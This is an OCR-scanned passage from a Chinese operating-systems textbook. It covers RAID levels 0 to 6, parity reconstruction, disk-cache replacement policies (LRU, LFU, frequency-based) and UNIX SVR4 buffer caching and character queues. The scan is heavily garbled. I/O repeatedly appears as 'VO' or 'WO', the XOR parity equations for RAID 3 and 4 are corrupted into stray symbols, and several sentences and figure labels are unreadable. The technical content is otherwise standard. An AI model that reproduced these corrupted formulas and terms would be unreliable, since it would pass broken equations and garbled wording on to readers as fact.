虑 使 用 RAID 0 实现 高 数据 传送 率 。 对 于 需要 高 传送 率 的 应 用 程序 ， 必 须 满足 两 个 要 求 : 首先 ， 
高 传送 能 力 必须 存在 于 主机 存储 器 和 单个 磁盘 驱动 器 之 间 的 整个 路 径 中 , 包括 内 部 控制 总 线 、 主 
机 系统 VO BR, VO 适配器 和 主机 存储 器 总 线 。 

第 二 个 要 求 是 应 用 程序 必须 产生 能 够 有 效 使 用 磁盘 阵列 的 VO 请 求 。 以 条 带 的 大 小 作为 参 
照 ， 如 果 请 求 的 是 大 量 逻辑 上 连续 的 数据 ， 则 第 二 个 要 求 就 可 以 得 到 满足 。 在 这 种 情况 下 ,单个 
VO 请 求 涉及 从 多 个 磁盘 中 并 行 传送 数据 ， 相 对 于 单个 磁盘 的 传送 ， 可 以 增加 有 效 的 传送 速率 。 
RAID 0 实现 高 速 VO 请 求 率 

在 面向 事务 的 环境 中 , 用 户 对 响应 时 间 的 关注 超过 了 对 传送 速率 的 关注 。 对 一 个 关于 少量 数 
据 的 单独 的 WO 请 求 ，L/O 时 间 由 磁头 的 移动 ( 寻 道 时 间 ) 和 磁盘 的 移动 (旋转 延迟 ) 决定 。 

在 一 个 事务 处 理 环境 中 , 每 秒 可 能 有 上 百 条 LO 请 求 。 一 个 磁盘 阵列 可 以 通过 在 多 个 磁盘 中 
平衡 IO 负载 来 提供 较 高 的 执行 速率 。 只 有 当 存 在 多 个 未 完成 的 VO 请 求 时 才能 实现 有 效 的 负载 
平衡 , 这 意味 着 存在 多 个 独立 的 应 用 程序 , 或 者 存在 一 个 能 够 产生 多 个 异步 WO 请 求 的 面向 事务 
的 应 用 程序 。 这 个 性 能 还 会 受到 条 带 大 小 的 影响 。 如 果 条 带 相对 比较 大 ， 则 一 个 IO 请 求 可 能 只 
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包括 对 一 个 磁盘 的 访问 , 多 个 正在 等 待 的 VO 请 求 可 以 并 行 地 处 理 ， 从 而 减少 了 每 个 请 求 的 排队 
等 待 时 间 。 





d) RAID3 〈 交 错位 奇偶 数 校 验 ) e) RAID4〈 块 奇偶 校 验 ) 





g) RAID6 (MHILA) 


图 11.8 RAID 级 别 


11.6.2 RAID 级 别 1 
RAID 1 与 RAID 2 到 RAID 6 在 实现 元 余 的 方法 上 有 所 不 同 。RAID2 到 RAID6 的 RAID 方 
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案 中 是 使 用 某 种 形式 的 奇偶 计算 来 实现 元 余 的 , 而 RAID 1 是 通过 临时 复制 所 有 数据 来 实现 元 余 
的 。 如 图 11.8b R, Æ RAID 0 中 使 用 了 数据 条 带 化 。 但 在 这 种 情况 下 ， 每 个 逻辑 条 带 映射 到 
两 个 单独 的 物理 磁盘 上 ， 使 得 阵列 中 的 每 个 磁盘 都 有 一 个 包含 相同 数据 的 镜像 磁盘 。RAID1 也 
可 以 在 没有 数据 条 带 化 的 情况 下 使 用 ， 但 这 种 现象 较 少 发 生 。 
RAID 1 的 组 织 有 许多 比较 好 的 特征 : 
1) 读 请 求 可 以 由 包含 所 请 求 数据 的 任何 一 个 磁盘 提供 服务 ， 无 论 哪 一 个 拥有 最 小 寻 道 时 间 
和 旋转 延迟 。 
2) 写 请 求 需要 对 两 个 相应 的 条 带 都 进行 更 新 ， 但 这 可 以 并 行 完 成 。 因 此 ， 写 性 能 由 两 个 写 
操作 中 比较 慢 的 那 一 个 决定 ( 即 拥有 较 大 寻 道 时 间 和 旋转 延迟 的 那 一 个 ), 但 是 , RAID 1 
中 并 没有 “ 写 性 能 损失 ”"。RAID 级 别 2 到 级 别 6 涉及 奇偶 位 的 使 用 。 因 此 ， 一 个 条 带 被 
更 新 时 ， 阵 列 管理 软件 必须 首先 计算 并 更 新 奇偶 位 以 及 实际 需要 修改 的 条 带 。 
3 ) 从 失败 中 恢复 很 简单 。 当 一 个 驱动 器 失败 时 ， 仍 然 可 以 从 第 二 个 驱动 器 访问 到 数据 。 
RAID 1 的 主要 缺点 是 成 本 问题 ， 它 需要 两 倍 于 所 支持 的 逻辑 磁盘 的 空间 。 由 于 这 一 点 ， 使 
用 RAID 1 配置 的 驱动 器 ， 通 常用 于 保存 系统 软件 和 数据 以 及 其 他 极其 重要 的 文件 。 在 这 些 情况 
F, RAID 1 提供 对 所 有 数据 的 实时 备份 ， 使 得 即使 一 个 磁盘 失败 了 ， 仍 然 可 以 立即 得 到 所 有 的 
重要 数据 。 
在 面向 事务 处 理 的 环境 中 ， 如 果 有 许多 读 请 求 ， 则 RADI 可 以 实现 高 VO 请 求 速度 。 在 这 
种 情况 下 , RAID 1 的 性 能 可 以 接近 RAID 0 的 两 倍 。 但是, 如 果 有 相当 一 部 分 IO 请 求 是 写 请 求 ， 
那么 与 RAID 0 相 比 ，RAID 1 不 会 有 明显 的 性 能 优势 。 对 于 那些 对 数据 传送 敏感 的 应 用 程序 ， 
并 且 大 部 分 VO 请 求 为 读 请 求 时 , RAID 1 也 会 比 RAID 0 提供 更 好 的 性 能 。 如 果 应 用 程序 可 以 把 
每 个 读 请 求 分 裂 开 ， 使 得 所 有 的 磁盘 成 员 都 可 以 参与 ， 就 会 带 来 性 能 上 的 提高 。 


11.6.3 RAID 级 别 2 


RAID 级 别 2 和 级 别 3 使 用 了 一 种 并 行 访问 技术 。 在 并 行 访 问 阵 列 中 ， 所 有 磁盘 成 员 都 参与 
每 个 VO 请 求 的 执行 。 典 型 地 ， 所 有 磁盘 的 轴 心 是 同步 的 ,这 使 得 在 任何 给 定 的 时 刻 ， 每 个 磁头 
都 处 于 各 自 磁盘 中 的 同一 位 置 。 

和 其 他 RAID 方案 一 样 ,， RAID 2 也 使 用 数据 条 带 化 。 在 RAID 2 和 RAID 3 F, 条 带 非常 小 ， 
通常 只 有 一 个 字 节 或 一 个 字 。 对 于 RAID 2, 对 每 个 数据 磁盘 中 的 相应 位 都 计算 一 个 错误 校正 码 ， 
并 且 这 个 码 位 保存 在 多 个 奇偶 检验 磁盘 中 相应 的 位 中 。 典 型 地 , 错误 校正 使 用 汉 明 码 , 它 能 够 纠 
正 一 位 错误 并 检测 双 位 错误 。 

尽管 RAID 2 RAID 1 需要 的 磁盘 数 少 ， 但 它 仍 然 是 相当 昂贵 的 。 宛 余 磁 盘 的 数目 与 数据 
磁盘 数 的 对 数 成 正比 。 对 一 次 读 , 所 有 磁盘 都 被 同时 访问 到 , 被 请 求 的 数据 以 及 相关 的 错误 校正 
码 被 送 到 阵列 控制 器 。 如 果 有 一 个 一 位 错误 , 控制 器 可 以 立即 识别 并 改正 这 个 错误 , 使 得 读 操作 
的 存 取 时 间 不 会 减 慢 。 对 于 一 个 写 操作 ， 它 必须 访问 所 有 数据 磁盘 和 奇偶 检验 磁盘 。 

RAID 2 仅仅 是 在 可 能 发 生 许多 磁盘 错误 的 环境 中 是 一 种 有 效 的 选择 。 如 果 单 个 磁盘 和 磁盘 
驱动 器 的 可 靠 性 很 高 ，RAID 2 往往 会 表现 出 矫 枉 过 正 ， 因 而 不 切实 际 。 


11.6.4 RAID 级 别 3 


RAID 3 的 组 织 方式 类 似 于 RAID 2, 不同 之 处 在 于 不 论 磁盘 阵列 有 多 大 ，RAID 3 只 需要 一 
个 元 余 磁盘 。RAID 3 采用 并 行 访问 ， 数据 分 布 在 比较 小 的 条 带 中 。RAID 3 为 所 有 数据 磁盘 中 同 
一 位 置 的 位 的 集合 计算 一 个 简单 的 奇偶 校 验 位 ， 而 不 是 错误 校正 码 。 
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元 余 性 

如 果 发 生 磁盘 故障 ， 则 访问 奇偶 检验 驱动 器 ,并 且 从 其 余 的 设备 中 重新 构造 数据 。 如 果 失 败 
的 驱动 器 被 替换 ， 则 丢失 的 数据 可 以 恢复 到 新 的 驱动 器 上 ， 并 继续 执行 操作 。 

数据 的 重新 构造 非常 简单 。 考 虑 一 个 有 5 个 驱动 器 的 阵列 ,其 中 XO 到 X3 包含 数据 ，X4 为 
奇偶 校 验 磁盘 。 第 i 位 的 奇偶 检验 可 计算 如 下 : 

X4(i) = X3(i) © X2(i) © X1(i) ® X0) 
其 中 @ Ra FRE. 
假设 驱动 器 X1 失败 ， 如 果 给 上 面 的 等 式 两 边 都 加 上 XALX, WA 
X1(i) = X4(i) © X3(i) 8 X2(i) 8 XO0(i) 
因此 ，X1 中 每 个 条 带 的 数据 内 容 都 可 以 由 阵列 中 其 余 磁 盘 相应 的 条 带 的 内 容重 新 生成 。 这 个 原 
理 对 RAID 级 别 3 到 级 别 6 都 适用 。 

如 果 发 生 磁盘 故障 ， 在 缩减 模式 下 (reduced mode) 仍然 可 以 得 到 所 有 的 数据 。 在 这 种 模式 
下 ， 对 于 读 操 作 ， 丢 失 的 数据 可 以 在 运行 中 通过 使 用 异 或 运算 重新 生成 ; 当 数 据 往 一 个 缩减 的 
RAID 3 阵列 中 写 时 ， 必 须 为 以 后 的 重新 生成 维护 奇偶 校 验 的 一 致 性 。 要 返回 到 完全 操作 ， 要 求 
替换 失败 的 磁盘 ， 并 且 这 个 失败 磁盘 的 全 部 内 容重 新 生成 在 新 磁盘 中 。 

性 能 

由 于 数据 分 成 了 很 小 的 条 带 ，RAID 3 可 以 达到 非常 高 的 数据 传送 率 。 任 何 一 个 1/O 请 求 意 
味 着 从 所 有 数据 磁盘 中 并 行 传送 数据 。 对 大 数据 量 的 传送 ,性 能 的 提高 非常 显著 。 另 一 方面 ,由 
于 一 次 只 能 执行 一 个 VO 请 求 ， 因 此 在 面向 事务 处 理 的 环境 中 性 能 并 不 乐观 。 


11.6.5 RAID 级 别 4 


RAID 级 别 4 到 级 别 6 使 用 了 一 种 独立 访问 技术 。 在 独立 访问 阵列 中 ， 每 个 磁盘 成 员 都 独立 
地 运转 ， 因 此 不 同 的 WO 请 求 可 以 并 行 地 得 以 满足 。 因 此 ， 独 立 访问 阵列 更 适合 于 需要 较 高 TO 
请 求 速度 的 应 用 程序 ， 而 相对 不 太 适 合 于 需要 较 高 数据 传送 率 的 应 用 程序 。 

跟 其 他 RAID 方案 一 样 , 这 里 也 使 用 了 数据 条 带 化 。 对 于 RAID 4 到 RAID 6, 数据 条 带 相对 
比较 大 。 在 RAID 4 中 ， 对 每 个 数据 磁盘 中 相应 的 条 带 计 算 一 个 逐 位 奇偶 校 验 ， 奇 偶 校 验 位 保存 
在 奇偶 校 验 磁 盘 相 应 的 条 带 中 。 

当 执 行 一 个 非常 小 的 IO 写 请 求 时 ，RAID 4 会 引发 写 性 能 损失 。 每 当 写 操作 发 生 时 ， 阵 列 
管理 软件 不 但 必须 更 新 用 户 数据 , 而 且 必 须 更 新 相应 的 奇偶 校 验 位 。 考 虑 一 个 有 5 个 驱动 器 的 阵 
列 ， 其 中 X0 到 X3 包含 数据 ，X4 为 奇偶 校 验 磁 盘 。 假 设 执 行 的 写 操作 只 涉及 磁盘 X1 的 一 个 条 
带 。 最 初 ， 对 于 每 位 i， 有 以 下 关系 成 立 : 

X4(i) = X3(i) © X2(i) @ X1(i) 8 X07) (11.1) 
在 更 新 后 ， 可 能 修改 过 的 位 用 一 个 撤 号 C) 表示 : 
X4' (i) = X3(i) ® X2(é) @ X1' (i) ® X00) 
= X3(i) ® X2(i) @ X1' (i) © XO) @X1 (i) 8 X1(i) 
= X3(i) © X2(i) © X1 (i) © XO(i) e X1 () e X107) 
= X4(i) © X1(i) ® X1' (i) 

上 面 等 式 的 处 理 过 程 如 下 ; 第 一 行 表示 X 的 改变 也 会 影响 到 奇偶 校 验 磁盘 上 的 X4; 第 二 
行 添加 了 短 式 [@ X1(i)@ X1(i)]， 等 式 依然 成 立 的 原因 是 ,任何 数 自身 的 异 或 操作 为 0， 而 0 并 不 
影响 异 或 操作 的 结果 。 通 过 添加 短 式 ， 就 可 以 方便 地 得 到 第 三 行 。 最 后 利用 式 (11.1 ), 将 第 三 
行 的 前 四 项 替换 为 X4(i)。 

为 计算 新 的 奇偶 校 验 , 阵列 管理 软件 必须 读 取 旧 的 用 户 条 带 和 旧 的 奇偶 校 验 条 带 , 然后 用 新 
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数据 和 新 近 计 算 的 奇偶 校 验 更 新 这 两 个 条 带 。 因 此 ， 每 个 条 带 写 操作 都 包含 两 次 读 和 两 次 写 。 
对 于 涉及 所 有 磁盘 驱动 器 条 带 的 大 数据 量 的 IO 写 的 情况 , 奇偶 校 验 可 以 很 容易 地 得 到 , E 
只 需要 使 用 新 数据 位 进行 计算 。 因 此 ， 奇 偶 校 验 驱 动 器 可 以 和 数据 驱动 器 一 起 并 行 地 进行 更 新 ， 
从 而 不 需要 额外 的 读 和 写 。 
对 于 任何 一 种 情况 , 每 次 的 写 操作 都 必须 包含 奇偶 校 验 磁盘 , 因此 奇偶 校 验 磁盘 有 可 能 成 为 
瓶颈 。 


11.6.6 RAID 级 别 5 


RAID 5 的 组 织 类 似 于 RAID 4, 不同 之 处 在 于 RAID 5 把 奇偶 校 验 条 带 分 布 在 所 有 磁盘 中 。 
一 个 典型 的 分 配方 案 是 循环 分 配 ， 如 图 11.8f 所 示 。 对 一 个 n 磁盘 阵列 ， 开 始 的 n 个 条 带 的 奇偶 
校 验 条 带 在 一 个 与 它们 不 同 的 磁盘 上 ， 然 后 重复 这 种 模式 。 

奇偶 校 验 条 带 分 布 在 所 有 驱动 器 上 ， 可 以 避免 RAID 4 中 一 个 奇偶 校 验 磁盘 潜在 的 IO 瓶颈 
问题 。 


11.6.7 RAID 级 别 6 


RAID 6 是 伯克利 的 研究 人 员 在 一 篇 后 续 文 章 中 引入 的 [KATZ89 ]。 在 RAID 6 方案 中 ， 采 
用 了 两 种 不 同 的 奇偶 校 验 计 算 ， 并 保存 在 不 同 磁盘 的 不 同 块 中 。 因 此 ， 用 户 数据 需要 N 个 磁盘 
的 RAID 6 阵列 由 N+2 个 磁盘 组 成 。 

图 11.8g 说 明了 这 种 方案 。P 和 Q 是 两 种 不 同 的 数据 校 验算 法 , 其 中 一 种 是 RAID 4 和 RAID 
5 所 使 用 的 异 或 计算 ， 另 一 种 是 独立 数据 校 验算 法 。 这 就 使 得 即便 有 两 个 包含 用 户 数据 的 磁盘 发 
生 错 误 ， 也 可 以 重新 生成 数据 。 

RAID 6 的 优点 是 它 提 供 了 极 高 的 数据 可 用 性 。 在 MTTR (平均 修复 时 间 ) 间隔 内 ， 必 须 同 
时 有 三 个 磁盘 发 生 故 障 ， 数 据 才 会 丢失 。 但 是 ， 另 一 方面 ，RAID 6 导致 了 严重 的 写 性 能 损失 ， 
因为 每 次 写 操作 都 会 影响 两 个 校 验 块 。[EISC07] 中 的 性 能 测试 表明 ， 相 对 于 RAID 5, RAID 6 控 
制 器 会 有 30% 以 上 的 整体 写 性 能 损失 。RAID 5 和 RAID 6 读 性 能 相当 。 


11.7 ”磁盘 高 速 缓存 


1.6 节 和 附录 LA 中 总 结 了 高 速 缓冲 存储 器 。 术 语 高 速 缓冲 存储 器 (cache memory ) 通常 指 
一 个 比 内 存 小 且 比 内 存 快 的 存储 器 , 这 个 存储 器 位 于 内 存 和 处 理 器 之 间 。 这 种 高 速 缓冲 存储 器 通 
过 利用 局 部 性 原理 ， 可 以 减少 平均 存储 器 存 取 时 间 。 

同样 的 原理 可 以 用 于 磁盘 存储 器 。 特别 地 , 一 个 磁盘 高 速 缓存 是 内 存 中 为 磁盘 扇 区 设置 的 一 
个 缓冲 区 ， 它 包含 有 磁盘 中 某 些 扇 区 的 副本 。 当 出 现 一 个 请 求 某 一 特定 扇 区 的 IO 请 求 时 , 首先 
进行 检测 ， 以 确定 该 扇 区 是 否 在 磁盘 高 速 缓存 中 。 如 果 在 , 则 该 请 求 可 以 通过 这 个 高 速 缓存 来 满 
E; 如 果 不 在 ， 则 把 被 请 求 的 鹿 区 从 磁盘 读 到 磁盘 高 速 缓 存 中 。 由 于 访问 的 局 部 性 现象 的 存在 ， 
当 一 块 数据 被 取 人 高 速 缓存 以 满足 一 个 IO 请 求 时 ， 很 有 可 能 将 来 还 会 访问 到 这 一 块 数据 。 


11.7.1 设计 考虑 


有 许多 设计 问题 需要 考虑 。 首 先 ， 当 一 个 IO 请 求 从 磁盘 高 速 缓存 中 得 到 满足 时 ， 磁 盘 高 速 
缓存 中 的 数据 必须 传送 到 发 送 请 求 的 进程 。 这 可 以 通过 在 内 存 中 把 这 一 块 数据 从 磁盘 高 速 缓 存 传 
送 到 分 配给 该 用 户 进程 的 存储 空间 中 , 或 者 简单 地 通过 使 用 一 个 共享 内 存 , 传送 指向 磁盘 高 速 组 
存 中 相应 项 的 指针 。 后 一 种 方法 节省 了 内 存 到 内 存 的 传送 时 间 ， 并 且 人 允许 其 他 的 进程 使 用 第 5 
章 所 描述 的 读者 - 写 者 模型 进行 共享 访问 。 

第 二 个 必须 解决 的 设计 问题 是 置换 策略 。 当 一 个 新 扇 区 被 读 人 磁盘 高 速 缓存 时 , 必须 置换 出 
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来 一 个 已 存在 的 块 。 同 样 的 问题 在 第 8 章 中 也 曾 提出 , 这 就 需要 一 个 页 面 置 换算 法 。 人 们 已 经 尝 
试 过 许多 算法 ， 最 常用 的 算法 是 最 近 最 少 使 用 算法 ( LRU ): 置换 在 高 速 缓存 中 未 被 访问 的 时 间 
最 长 的 块 。 逻 辑 上 ,高 速 缓存 由 一 个 关于 块 的 栈 组 成 ， 最 近 访问 过 的 块 在 栈 项 。 当 高 速 缓存 中 的 
一 块 被 访问 到 时 ,， 它 从 栈 中 当前 的 位 置 移 到 栈 顶 。 当 一 个 块 从 输 存 中 取 和 时， 把 位 于 栈 底 的 那 一 
块 移出 ;并 把 新 到 来 的 块 压 和 人 栈 顶 。 当 然 ， 并 不 需要 在 内 存 中 真正 移动 这 些 块 ， 有 -一个 栈 指针 与 
高 速 缓存 相关 联 。 

另 一 种 可 能 的 算法 是 最 不 常用 算法 (LFU): 置换 集合 中 被 访问 次 数 最 少 的 块 。LFU 可 以 通 
过 给 每 个 块 关联 一 个 计数 器 来 实现 。 当 一 个 块 被 读 人 时 ， 它 的 计数 器 被 指定 为 1; 当 每 次 访问 到 
这 一 块 时 ， 它 的 计数 器 增 1。 当 需要 置换 时 ， 选 择 计数 器 值 最 小 的 块 。 直 觉 上 LFU 比 LRU 更 适 
合 ， 因 为 LFU 使 用 了 关于 每 个 块 的 更 多 的 相关 信息 。 

一 个 简单 的 LFU 算法 有 以 下 问题 。 可 能 存在 一 些 块 ， 从 整体 上 看 很 少 发 生 对 它们 的 访问 ， 
但 是 当 它 们 被 访问 时 ,由 于 局 部 性 原理 , 会 在 一 段 很 短 的 时 间 间 隔 里 出 现 很 多 重复 访问 ,从 而 使 
访问 计数 器 的 值 很 高 。 当 这 个 间隔 过 去 后 , 访问 计数 器 的 值 可 能 会 让 人 误解 , 它 并 不 表示 很 快 又 
会 访问 到 这 一 块 。 因 此 受 局 部 性 影响 ，LFU 算法 不 是 一 个 好 的 置换 算法 。 

为 克服 LFU 的 这 些 难 点 , [ ROBI90 ] 中 提出 了 一 种 称 做 基于 频率 的 置换 算法 。 为 了 简单 起 
见 ， 首 先 考虑 一 种 简化 了 的 版 本 ， 如 图 11.9a 所 示 。 和 LRU 算法 一 样 ， 块 在 逻辑 上 被 组 织 成 一 
个 模 。 栈 顶 的 一 部 分 留 作 一 个 新 区 。 当 出 现 一 次 高 速 缓存 命中 时 ， 被 访问 的 块 移 到 栈 顶 。 如 果 访 
块 已 经 在 这 个 新 区 中 ， 它 的 访问 计数 器 不 会 增加 ， 和 否则 ， 计 数 器 增 1。 如 果 有 足够 大 的 新 区 ， 在 
一 个 很 短 的 时 间 间隔 中 被 重复 访问 的 那些 块 的 访问 计数 器 的 结果 不 会 改变 。 发 生 -一 次 未 命中 时 ， 
访问 计数 器 值 最 小 且 不 在 新 区 中 的 块 被 选择 置换 出 。 如 果 有 不 只 一 个 这 样 的 候选 块 ,那么 就 选择 
近期 最 少 使 用 的 这 样 的 块 。 
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b) 使 用 三 个 区 
图 11.9 ”基于 频率 的 置换 


作者 声称 这 个 策略 比 LRU 仅 有 略微 的 提高 。 它 存在 以 下 问题 : 
1) 当 出 现 一 次 高 速 缓存 未 命中 时 ， 一 个 新 块 被 取 入 到 新 区 ， 计 数 器 的 值 为 1。 
. 2) 只 要 该 块 留 在 新 区 中 ， 计 数 器 的 值 保持 为 1。 
3) 最 终 这 个 块 的 年 龄 超出 了 新 区 ， 但 它 的 计数 器 值 仍然 为 1。 
.4 ) 如 果 这 个 块 没有 很 快 地 被 再 次 访问 到 ， 它 很 有 可 能 被 置换 ， 因 为 与 那些 不 在 新 区 中 的 块 相 
比 ， 它 的 访问 计数 器 的 值 必然 是 最 小 的 。 换 名 话说， 对 于 那些 年 龄 超出 了 新 区 的 块 ， 即 使 它 
们 相对 比较 频繁 地 被 访问 到 ， 但 是 通常 没有 足够 长 的 时 间 间 隔 让 它们 建立 新 的 访问 计数 。 
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关于 这 个 问题 的 进一步 改进 方案 是 ， 把 栈 划 分 成 三 个 区 : 新 区 、 中 间 区 和 老区 ， 如 图 11.9b 
所 示 。 和 和 前面 一 样 ,位 于 新 区 中 的 块 , 其 访问 计数 器 不 会 增加 。 但是, 只 有 在 老区 中 的 块 才 符 合 
置换 条 件 。 假 设 有 足够 大 的 中 间 区 ,这 就 使 得 相对 比较 频繁 地 被 访问 到 的 块 , 在 它们 变 成 符合 置 
换 条 件 的 块 之 前 ， 有 机 会 增加 自己 的 访问 计数 器 。 作 者 的 模拟 研究 表明 , 这 种 改进 后 的 策略 比 简 
单 的 LRU 或 LFU 有 显著 的 提高 。 

-不论 采 用 哪 种 特殊 的 置换 策略 ,置换 都 可 以 按 需 发 生 或 预先 发 生 。 对 前 一 种 情况 ， 只 有 当 需 
要 用 到 存储 槽 时 才 置 换 这 个 遍 区 。 对 于 后 一 种 情况 ,一 次 可 以 释放 许多 个 存储 槽 。 使 用 后 一 种 方 
法 的 原因 与 写 回 万 区 的 要 求 相 关 。 如 果 一 个 肩 区 被 读 人 高 速 缓存 并 且 仅 仅 用 于 读 , 那么 当 它 被 置 
Ki, 并 不 需要 和 写 回 到 磁盘 。 但是， 如果 该 局 区 已 经 被 修改 了 ， PA RA eRe l 
到 磁盘 ， 这 时 ， 成 簇 地 写 回 并 且 按 顺序 写 以 减少 寻 道 时 间 是 非常 有 意义 的 。 


11.7.2 ”性 能 考虑 


在 附录 1A 中 讲述 的 关于 性 能 方面 的 考虑 同样 适用 于 这 里 ， 高 速 缓存 的 性 能 问题 可 以 简化 
成 是 否 可 以 达到 某 个 给 定 的 未 命中 率 。 这 取决 于 访问 磁盘 的 局 部 性 行为 、 置换 竺 法 和 其 他 设计 
因素 。 但 是 , 未 命中 率 主 要 是 关于 磁盘 高 速 缓存 大 小 的 函数 。 图 11.10 概括 了 使 用 LRU 的 多 个 
研究 结果 ， 一 个 是 运行 在 VAX 上 的 UNIX 系统 [ OUST85 ]， 一 个 是 IBM 大 型 机 (mainframe ) 
操作 系统 [ SMIT85 ]。 图 11.11 给 出 了 基于 频率 的 置换 算法 的 模拟 研究 结果 。 通过 对 这 两 个 图 
的 比较 可 以 得 出 这 类 性 能 评估 的 一 个 风险 。 这 些 图 看 上 去 说 明了 LRU 的 性 能 优 于 基于 频率 的 
置换 算法 , 但 是 ， 当 使 用 相同 高 速 缓 存 结构 和 相同 访问 模式 时 ， 再 对 它们 进行 比较 ， ., 则 基于 频 
率 的 置换 算法 优 于 LRU。 因 此 ,访问 模式 的 顺序 和 相关 的 设计 问题 ， 如 抉 大 小 ,将 对 性 能 产生 
重要 的 影响 。 


磁盘 高 速 缓存 失误 率 (%) 
磁盘 高 速 缓存 失误 率 〈%) 





0 5 0 1 2 25 30 0 5 10 15 2 25 30 


高 速 缓存 大 小 《MB) 高 速 缓存 大 小 《MB) | 
图 11.10 一 些 使 用 LRU 的 磁盘 高 速 图 11.11 使 用 基于 频率 党 换算 法 时 的 磁盘 高 速 | 
缓存 性 能 结果 缓存 性 能 


11.8 UNIX SVR4 I/O 


在 UNIX 中 ， 每 个 单独 的 VO 设备 都 与 一 个 特殊 文件 相关 联 。 它 们 由 文件 系统 管理 ,并 是 按 
照 与 用 户 数据 相同 的 方式 被 读 写 , 这 就 给 用 户 和 进程 提供 了 清晰 一 致 的 接口 。 为 了 从 设备 读 或 向 
设备 写 ， 可 以 给 与 该 设备 相关 联 的 特殊 文件 发 送 读 请 求 或 写 请 求 。 
”图 11.12 显示 了 VO 机 制 的 逻辑 结构 。 文件 子 系统 管理 辅 存 设备 中 的 文件 。 此 外 ， 由 于 设备 
被 当做 文件 ， 因 而 文件 子 系统 还 充当 到 设备 的 进程 接口 。 
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UNIX 中 有 两 种 类 型 的 VO: 有 缓冲 和 无 缓冲 。 有 缓冲 的 VO 通过 系统 缓冲 区 传送 ， 而 无 组 
冲 的 WO (通常 包括 DMA 机 制 ) 则 直接 在 VO 模块 和 进程 

IO 区 域 之 间 传 送 。 对 于 有 缓冲 的 VO, 可 以 使 用 两 种 类 型 
的 缓冲 区 : 系统 缓冲 区 高 速 缓存 和 字符 队列 。 


11.8.1 缓冲 区 高 速 缓存 


UNIX 中 的 缓冲 区 高 速 缓存 本 质 上 是 一 个 磁盘 高 速 组 
存 。 关 于 磁盘 的 VO 操作 通过 缓冲 区 高 速 缓存 处 理 。 缓 冲 
区 高 速 缓 存 和 用 户 进程 空间 之 间 的 数据 传送 通常 使 用 
“ DMA 进行 。 由 于 缓冲 区 高 速 缓存 和 进程 VO 区 域 都 在 内 存 
中 ， 在 这 种 情况 下 使 用 DMA 机 制 是 为 了 执行 一 个 从 存储 
器 到 存储 器 的 复制 操作 。 这 并 不 会 消耗 任何 处 理 器 周期 ， 但 是 它 确 实 消耗 了 总 线 周 期 。 

为 管理 缓冲 区 高 速 缓存 ， 需 要 维护 下 面 三 个 列表 : 

@ 自由 列表 : 列 出 了 高 速 缓存 中 的 所 有 可 用 于 分 配 的 存储 模 (一 个 存储 槽 相当 于 UNIX 中 

的 一 个 缓冲 区 ， 每 个 存储 槽 保存 一 个 磁盘 肩 区 )。 

© 设备 列表 : 列 出 了 当前 与 每 个 磁盘 相关 联 的 所 有 缓冲 区 。 

@ 驱动 程序 VO 队列 : 列 出 了 正在 某 个 特定 的 设备 上 进行 IO 或 等 待 IO 的 缓冲 区 。 

所 有 缓冲 区 都 应 该 或 者 在 自由 列表 中 , 或 者 在 驱动 程序 IO 队列 中 。 一 个 缓冲 区 一 且 与 一 个 
设备 相关 联 , 那么 即使 它 在 自由 列表 中 , 也 将 一 直 保持 与 该 设备 相关 联 , 直到 它 被 重新 使 用 并 与 
另 一 个 设备 相关 联 。 这些 列 表 是 通过 与 每 个 缓冲 区 相关 联 的 指针 来 维护 的 , 而 不 是 真正 的 物理 上 
分 离 的 列表 。 

当 访问 某 个 特定 设备 上 的 一 个 物理 块 号 时 ， 操 作 系统 首先 检查 该 块 是 否 在 缓冲 区 高 速 缓存 
中 。 为 使 搜索 时 间 最 小 ， 设 备 列表 被 组 织 成 一 个 散 列 表 ， 使 用 与 附录 8A( 如 图 8.27b 所 示 ) 中 
讲述 的 使 用 链 的 溢出 类 似 的 技术 。 图 11.13 描述 了 缓冲 区 高 速 缓存 的 一 般 组 织 。 有 一 个 国定 长 度 
的 散 列表 , 包含 指向 缓冲 区 高 速 缓 存 的 指针 。 每 个 到 〈 设备 # ， 块 # ) 的 访问 映射 到 散 列表 中 某 个 
特定 的 项 , 该 项 中 的 指针 指向 链 中 的 第 一 个 缓冲 区 。 与 每 个 缓冲 区 相关 联 的 散 列 指针 指向 该 散 列 
表 项 的 链 中 的 下 一 个 缓冲 区 。 因 此 ， 对 所 有 映射 到 同一 个 散 列 表 项 的 设备 #， 块 # ) 访问 ， ar 
相应 的 块 在 缓冲 区 高 速 缓存 中 ， 则 该 缓冲 区 在 该 
散 列表 项 的 链 中 。 因 些 ， 搜 索 缓冲 区 高 速 缓存 的 


长 度 减少 的 因子 为 N， 其 中 是 散 列表 的 长 度 。 e A See T 


对 于 块 置换 ， 使 用 的 是 最 近 最 少 使 用 算法 : 
当 一 个 缓冲 区 已 经 分 配给 一 个 磁盘 块 时 ， 则 它 不 
会 再 用 于 另 一 个 块 ， 直 到 所 有 别 的 缓冲 区 都 已 经 wee, ea 
在 更 近 的 时 间 内 被 使 用 了 。 自 由 列表 保留 最 近 最 
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图 11.12 UNIX LO 结构 


自由 列表 指针 


散 列 指针 


少 使 用 的 顺序 。 


11.8.2 ”字符 队列 自由 列表 指针 


对 于 面向 块 的 设备 ， 如 磁盘 和 USB, HAR 
冲 区 高 速 缓存 可 以 为 它们 提供 有 效 的 服务 。 另 一 
种 不 同形 式 的 缓冲 适合 于 面向 字符 的 设备 , 如 终端 和 打印 机 。 一 个 字符 队列 或 者 被 一 个 IO 设备 
写 、 被 一 个 进程 读 , 或 者 被 一 个 进程 写 、 被 一 个 设备 读 。 对 于 这 两 种 情况 ,都 可 以 使 用 第 5 章 介 


sirere 
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绍 的 生产 者 /消费 者 模型 。 因 此 ， 字 符 队 列 只 能 被 读 一 次 ， 当 每 个 字符 都 被 读 人 后 ， 该 队列 被 迅 
速 销毁 。 这 与 缓冲 区 高 速 缓存 不 同 ， 缓 冲 区 高 速 缓存 可 以 被 读 取 许 多 次 ， 因 此 采用 的 是 读者 / 写 
者 模型 ( 见 第 5 章 )。 


11.8.3 无 缓冲 MO 


无 缓冲 VO 是 设备 和 进程 空间 之 间 简 单 的 DMA, 它 总 是 进程 执行 WO 的 一 种 最 快速 的 方法 。 
执行 无 缓冲 MO 的 进程 被 锁定 在 内 存 中 , 不 能 被 换 出 。 这 就 会 导致 由 于 绑 定 部 分 内 存 而 减少 了 交 
换 的 机 会 ， 从 而 降低 了 整个 系统 的 性 能 。 同 样 ，1/O 设备 与 该 进程 在 传送 过 程 中 绑 定 在 一 起 ， 这 
使 得 这 些 WO 设备 对 于 其 他 进程 是 不 可 用 的 。 


